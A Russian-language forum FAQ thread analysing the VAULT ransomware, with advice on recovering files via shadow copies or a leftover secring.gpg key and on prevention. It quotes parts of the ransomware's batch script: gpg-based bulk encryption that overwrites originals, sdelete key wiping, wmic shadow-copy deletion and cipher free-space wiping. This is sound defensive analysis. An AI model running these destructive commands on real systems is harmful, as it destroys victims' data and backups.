Технический форум
Вернуться   Технический форум > Компьютерный форум > Форум по вирусам и антивирусам > FAQ


Ответ
 
Опции темы Опции просмотра
Старый 01.04.2015, 18:21   #1 (permalink)
safety
Member
 
Регистрация: 12.07.2011
Сообщений: 31,192
Записей в дневнике: 6
Сказал(а) спасибо: 1
Поблагодарили 21 раз(а) в 7 сообщениях
Репутация: 15348
По умолчанию VAULT. Что делать?

vault.jpg
Если вам необходимо восстановить документы зашифрованные VAULT, выполните следующие действия:

1. Проверьте наличие теневых копий на дисках, если есть чистые теневые копии, восстановить документы можно без расшифровки. Используйте для работы с теневыми копиями ShadowExplorer

если теневые копии отсутствуют, возможно были отключены шифратором, восстановите (на будущее) через настройки защиты дисков резервирование пространства в 5-10% под теневые копии.

2. если теневые и архивные копии отсутствуют, вы можете попытаться самостоятельно выполнить расшифровку документов.
для этого необходимо найти файл secring.gpg. secring.gpg(sec key) здесь нужен не любой, не найденный по дороге домой из сетевого форума, а созданный на вашей машине (как правило в %TEMP% юзера) в момент запуска процесса шифрования. Хотя вероятность успешного поиска secring.gpg невелика, поскольку шифратор тщательно затирает данный ключ с помощью утилиты sdelete.exe.

Код:
"%temp%\sdelete.exe" /accepteula -p 4 -q "%temp%\secring.gpg"
"%temp%\sdelete.exe" /accepteula -p 4 -q "%temp%\vaultkey.vlt"
"%temp%\sdelete.exe" /accepteula -p 4 -q "%temp%\confclean.list"
Повторный запуск шифратора с целью получения этого ключа не поможет. ключ будет создан уже с другим отпечатком и ID, и для расшифровки ваших документов не подойдет. пробуйте искать данный ключ среди удаленных файлов, но обязательно ненулевого размера. ~1Кб.

что делает шифратор с исходными файлами:

Код:
dir /B "%1:\"&& for /r "%1:\" %%i in (*.xls *.doc) do (
echo "%%TeMp%%\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& rename "%%i" "%%~nxi.vault">> "%temp%\cryptlist.lst"
echo %%i>> "%temp%\conf.list"
)
после шифрования к примеру файла 1.doc рядом с ним создается зашифрованный файл 1.doc.gpg, затем зашифрованный 1.doc.gpg перемещается на место исходного_чистого с новым именем 1.doc, и только затем переименовывается в 1.doc.vault.
т.о. исходный файл не удаляется, а перезаписывается зашифрованным документом с целью невозможности его восстановления.
-------
Добавим, что злоумышленники после завершения шифрования оставляют на диске файлы VAULT.KEY и CONFIRMATION.KEY. Первый содержит экспортированный secring.gpg, но зашифрованный с помощью pub key злоумышленников, поэтому расшифровать его на нашей стороне невозможно. В CONFIRMATION.KEY содержится полный список зашифрованных файлов. Оба эти файла оставлены на диске в качестве жеста "доброй, но и злой" воли с целью "протянуть руку товарищеской, но платной помощи" пострадавшему юзеру.
--------
если sec key найден (живой и невредимый), вы можете установить GnuPG и GPGShell и проверить возможность расшифровки.

скачайте отсюда и установите GnuPG
+
отсюда можно скачать GPGShell

В GPGShell удобно (из контекстного меню) выполнять различные действия над файлами и ключами.
+
После установки в каталоге так же можно найти подробный мануал (gpg.man) по консольным командам в GnuPG.
-----------

как можно избежать встречи с VAULT?
1. будьте предельно внимательны при работе с почтой.
если вложенный в сообщение или добавленный по ссылке архив содержит исполняемые файлы *.exe, *.com, *.pif, *.js, *.cmd, *.scr, *.bat, то такой документ никак не может быть офисным документом. Значит вас вводят в заблуждение, выдавая черное за белое.
2. настройте самостоятельно или попросите админа настроить политики ограниченного запуска исполняемых программ из вложенных архивов.
например:

Код:
XP:%userprofile%\Local Settings\Temp\_tc\*.js
Win7:%userprofile%\Appdata\Local\Temp\_tc\*.js
3. Пробуйте с помощью HIPS запретить запись в файл %TEMP%\pubring.gpg. в любом случае, в данной модификации энкодера (если он использует GnuPG) после скачивания и запуска утилита gpg.exe (которая может быть переименована и упакована как угодно) вначале будет создавать ключевую пару pubring.gpg/secring.gpg, а затем уже - шифровать ваши данные с помощью созданных ключей.

4. Если предварительно положить (и защитить от изменения) известный вам ключ pubring.gpg, то в этом случае шифрование состоится, но известным ключом. Или не состоится.

(с), chklst.ru
safety вне форума   Ответить с цитированием
2 пользователя(ей) сказали cпасибо:
AlexZir (01.04.2015), Daniellos (01.04.2015)

Старый 01.04.2015, 18:21
Helpmaster
Member
 
Аватар для Helpmaster
 
Регистрация: 08.03.2016
Сообщений: 0

Скорее всего по этим ссылкам содержится много полезной для вас информации

Что делать с УМ-50А?
Что делать с плюшкинизмом?
И что делать дальше?
Что делать с деталями?
от нечего делать...

Старый 01.04.2015, 19:12   #2 (permalink)
Daniellos
Хозяин Медной Горы
 
Аватар для Daniellos
 
Регистрация: 01.08.2011
Адрес: Армавир
Сообщений: 12,159
Записей в дневнике: 8
Сказал(а) спасибо: 751
Поблагодарили 88 раз(а) в 27 сообщениях
Репутация: 57416
По умолчанию

Интересно, когда эта муть (шифрование) дойдёт до *nix?
Daniellos вне форума   Ответить с цитированием
Старый 01.04.2015, 19:42   #3 (permalink)
safety
Member
 
Регистрация: 12.07.2011
Сообщений: 31,192
Записей в дневнике: 6
Сказал(а) спасибо: 1
Поблагодарили 21 раз(а) в 7 сообщениях
Репутация: 15348
По умолчанию

что касается GnuPG то он реализован под разные системы:
https://www.gnupg.org/download/
Цитата:
OS Where Description Windows Gpg4win Installers for GnuPG stable download sig Simple installer for GnuPG modern download sig Simple installer for GnuPG classic OS X Mac GPG Installer from the gpgtools project GnuPG for OS X Installer for GnuPG modern Debian Debian site GnuPG stable and classic are part of Debian RPM rpmfind RPM packages for different OS Android Guardian project Provides a GnuPG 2.1 framework VMS antinode.info A port of GnuPG to OpenVMS RISC OS home page Sources and binaries for RISC OS
safety вне форума   Ответить с цитированием
Старый 01.04.2015, 20:25   #4 (permalink)
Daniellos
Хозяин Медной Горы
 
Аватар для Daniellos
 
Регистрация: 01.08.2011
Адрес: Армавир
Сообщений: 12,159
Записей в дневнике: 8
Сказал(а) спасибо: 751
Поблагодарили 88 раз(а) в 27 сообщениях
Репутация: 57416
По умолчанию

В Ubuntu 14.04 GNU Privacy Guard установлен по-умолчанию:
Код:
dan@dan-pc:~/Рабочий стол$ sudo apt-get install gnupg
Чтение списков пакетов… Готово
Построение дерева зависимостей       
Чтение информации о состоянии… Готово
Уже установлена самая новая версия gnupg.
обновлено 0, установлено 0 новых пакетов,
 для удаления отмечено 0 пакетов,
 и 0 пакетов не обновлено.
Для установки приложения, необходимо запустить Терминал, и набрать:

Код:
$ sudo apt-get install gnupg
Затем ввести пароль суперпользователя, и установить приложение.
Daniellos вне форума   Ответить с цитированием
Старый 01.04.2015, 20:37   #5 (permalink)
safety
Member
 
Регистрация: 12.07.2011
Сообщений: 31,192
Записей в дневнике: 6
Сказал(а) спасибо: 1
Поблагодарили 21 раз(а) в 7 сообщениях
Репутация: 15348
По умолчанию

Daniellos,
для шифрования в Ubuntu наверняка достаточно одного бинарника gpg, как это сделано сейчас в VAULT. он (VAULT) ведь не устанавливает в систему (Win) gpg полностью, а просто копирует шифрующую утилиту gpg.exe в каталог юзера и запускает ее из командного файла
safety вне форума   Ответить с цитированием
Ads

Яндекс

Member
 
Регистрация: 31.10.2006
Сообщений: 40200
Записей в дневнике: 0
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Репутация: 55070
Старый 21.06.2015, 12:54   #6 (permalink)
safety
Member
 
Регистрация: 12.07.2011
Сообщений: 31,192
Записей в дневнике: 6
Сказал(а) спасибо: 1
Поблагодарили 21 раз(а) в 7 сообщениях
Репутация: 15348
По умолчанию

июньский вариант ВАУЛТ:
Цитата:
Здравствуйте!
В соответствии с нашей информацией за Вашим предприятием до сих пор числиться недоплата (примерно 15 тыс р.).
Прошу проверить нашу информацию и ответить по возможности оплаты.
Скидываю акты и накладные по прошлогодней поставке (во вложении).

<u>ЗАГРУЗИТЬ ИНФОРМАЦИЮ</u>

С уважением,
Бухгалтер ООО Альфа-Системс Наталья Воронова
----------
схема распространения прежняя: через сообщения в электронную почту, со ссылкой на архив из сети. Архив содержит js в теле которого в закодированной форме (base64) содержатся модули, необходимые для шифрования.

раскодировать js с целью анализа исполняемых файлов можно здесь
Кодер/Декодер Base64 - Хитрые инструменты

для шифрования по прежнему используется gpg.exe v 1.4.18 в упакованном виде (UPX) и переименованным в winlogon.exe
Цитата:
gpg (GnuPG) 1.4.18
Copyright (C) 2014 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html&gt;
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Поддерживаются следующие алгоритмы:
С открытым ключом: RSA, RSA-E, RSA-S, ELG-E, DSA
Симметричные шифры: IDEA, 3DES, CAST5, BLOWFISH, AES, AES192, AES256, TWOFISH, CAMELLIA128, CAMELLIA192, CAMELLIA256
Хэш-функции: MD5, SHA1, RIPEMD160, SHA256, SHA384, SHA512, SHA224
Алгоритмы сжатия: Без сжатия, ZIP, ZLIB, BZIP2
ключевая пара, которая создается на стороне пользователя содержит имя Cellar
Цитата:
echo Key-Type: RSA> "%temp%\d623756e.1e103e00"
echo 4PZATNvx7Pv3h2NKWbnS9zBs9PHFcmjDdS4WcTg9jhqqhAecn6 hunKm3aHPZrUp6 >nul
echo Key-Length: 1024>> "%temp%\d623756e.1e103e00"
echo Name-Real: Cellar>> "%temp%\d623756e.1e103e00"
ключевая пара, используемая для шифрования ключей пользователя содержит имя VaultCrypt
схема шифрования файлов прежняя:
Цитата:
dir /B "%1:\"&& for /r "%1:\" %%i in (*.psd *.dwg *.cdr) do (
echo "%%TeMp%%\winlogon.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& RENAME "%%i" "%%~nxi.vault">> "%temp%\a43b4e32.09831a7f"
echo %%i>> "%temp%\bb312c4a.da2279a0"
шифрование ключей пользователя выполняется с помощью VaultCrypt:
Цитата:
if not exist "%temp%\VAULT.KEY" (
"%temp%\winlogon.exe" -r VaultCrypt --yes -q --no-verbose --trust-model always --encrypt-files "%temp%\8eacbbf1.e2fe1f1a"
RENAME "%temp%\8eacbbf1.e2fe1f1a.gpg" VAULT.KEY
)
if not exist "%temp%\CONFIRMATION.KEY" (
"%temp%\winlogon.exe" -r VaultCrypt --yes -q --no-verbose --trust-model always --encrypt-files "%temp%\7894c7d5.0b952c1f"
RENAME "%temp%\7894c7d5.0b952c1f.gpg" CONFIRMATION.KEY
)
заметим, что свои приватные ключи мошенники стали менять гораздо чаще.

удаление теневых копий на дисках выполняется с помощью системной утилиты wmic.exe:
Цитата:
echo objShell.ShellExecute "wmic.exe", "shadowcopy delete /nointeractive", "", "runas", 0 >> "%temp%\64da1372.vbs"
затирание ключей шифрования происходит посредством создания мусорного ключа с перемещением его в оригинальный ключ:
Цитата:
echo 4946f1b49f393e59b1d5019835b2dfac 5c309608f24fe8ad083301a4> "%temp%\secring.qpq"
echo VgAYLnWjxRk8vVuqXRjmQG5Zpf75VG6JjFCJ9YhPUwR2BhjYnH yLyEcDkPqf9GaD >nul
echo jKypPWhc2XQMSBfnwd55kkp9dbkDA3E7aaLxPr7fMHgNTu68jg bAG4gmgJP4K3LD >nul
echo 0b952c1f5295443d 13c486b3b43238045c309608bda77785d8da5076>> "%temp%\secring.qpq"
echo 0b952c1f 5295443d13c486b3 b43238045c309608 bda77785d8da5076>> "%temp%\secring.qpq"
move /y "%temp%\secring.qpq" "%temp%\secring.gpg"
для затирания удаленных файлов с целью предотвращения восстановления удаленной информации используется системная утилита cipher.exe
Цитата:
if exist "%systemroot%\system32\cipher.exe" (
FOR %%s IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO call :c53699f3 %%s
echo VLvqFsx2vrPgrLhuZWgT3XqJVRLw6kVeM2k6fgAhfs9bQ6MyAr Mq8k4xyZxJ >nul
goto 1acf5f5c
:c53699f3
cipher /w:%1:
safety вне форума   Ответить с цитированием
Ads

Яндекс

Member
 
Регистрация: 31.10.2006
Сообщений: 40200
Записей в дневнике: 0
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Репутация: 55070
Ответ

Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Выкл.
HTML код Выкл.
Trackbacks are Вкл.
Pingbacks are Вкл.
Refbacks are Выкл.




Часовой пояс GMT +4, время: 13:45.

Powered by vBulletin® Version 6.2.5.
Copyright ©2000 - 2014, Jelsoft Enterprises Ltd.